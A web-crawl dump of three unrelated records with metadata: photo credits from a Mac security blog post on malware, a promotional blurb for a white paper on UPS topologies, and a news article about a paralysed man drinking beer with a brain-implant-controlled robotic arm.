phishing image photo credit: ivanpw via photopin cc skull and crossbones photo credit: ☺ Lee J Haywood via photopin cc steal wifi photo credit: dana~2 via photopin cc
<urn:uuid:87c9c39d-b82a-4afc-a8d8-71e3cb7ce22b>
CC-MAIN-2017-04
https://www.intego.com/mac-security-blog/8-ways-to-accidentally-infect-your-friends-with-malware/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282110.46/warc/CC-MAIN-20170116095122-00226-ip-10-171-10-70.ec2.internal.warc.gz
en
0.929797
1,139
2.734375
3
There is much confusion in the marketplace about the different types of UPS systems and their characteristics. Each of these UPS types is defined, practical applications of each are discussed, and advantages and disadvantages are listed. With this information, an educated decision can be made as to the appropriate UPS topology for a given need. The varied types of uninterruptible power supplies (UPS) and their attributes often cause confusion in the data center industry. For example, it is widely believed that there are only two types of UPS systems, namely standby UPS and on-line UPS. These two commonly used terms do not correctly describe many of the UPS systems available. Many misunderstandings about UPS systems are cleared up when the different types of UPS topologies are properly identified. UPS topology indicates the basic nature of the UPS design. Various vendors routinely produce models with similar designs, or topologies, but with very different performance characteristics. Common design approaches are reviewed here, including brief explanations about how each topology works. This will help you to properly identify and compare systems. Download this white paper below to learn more.
<urn:uuid:1000ec4b-e6cf-4fe9-afbb-1482d469c7ef>
CC-MAIN-2017-04
http://www.bsminfo.com/doc/the-different-types-of-ups-systems-0001
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284376.37/warc/CC-MAIN-20170116095124-00134-ip-10-171-10-70.ec2.internal.warc.gz
en
0.942635
223
2.71875
3
One man’s seemingly simple act of drinking a beer has raised hopes about the potential for people with limited mobility to regain some independence. Californian Erik G. Sorto, paralyzed from the neck down more than 10 years ago, was able to will a robotic arm to smoothly move a glass of cold beer to his lips (video below). The technology that helped him do that is a chip implanted in the posterior parietal cortex, the part of the brain that processes intentions. It’s the first time a chip was implanted in that part of the brain. Currently, chips are implanted in the motor cortex, the part of the brain that controls movement. But the results have been stilted, jerky movements. The brain chip implants are part of a clinical collaboration between Caltech, Keck Medicine of USC and Rancho Los Amigos National Rehabilitation Center. “This research is relevant to the role of robotics and brain-machine interfaces as assistive devices, but also speaks to the ability of the brain to learn to function in new ways,” said neurologist Mindy Aisen, chief medical officer at Rancho Los Amigos. “We have created a unique environment that can seamlessly bring together rehabilitation, medicine, and science as exemplified in this study.” The results of the clinical trial appear in the May 22, 2015, edition of the journal Science. Sorto’s success is only the beginning. According to the Washington Post: Researchers are working on all manner of silicon-based devices that go inside the body and manipulate the body’s signals to create motion. They believe these chips will not only be able to help those with paralysis one day -- but also usher in a new era of robot adjuncts controlled by someone’s thoughts that will be able to perform all manner of jobs from lifting dangerous objects to filing papers. In the long term, the technology could mean greater independence for people with disabilities. And that’s something we could all raise a glass to. This story, "That must have been one great-tasting beer" was originally published by Fritterati.
<urn:uuid:598b9b98-a5c1-42e5-9993-6f3daed5eff0>
CC-MAIN-2017-04
http://www.itnews.com/article/2925506/that-must-have-been-one-great-tasting-beer.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280723.5/warc/CC-MAIN-20170116095120-00346-ip-10-171-10-70.ec2.internal.warc.gz
en
0.949033
446
2.78125
3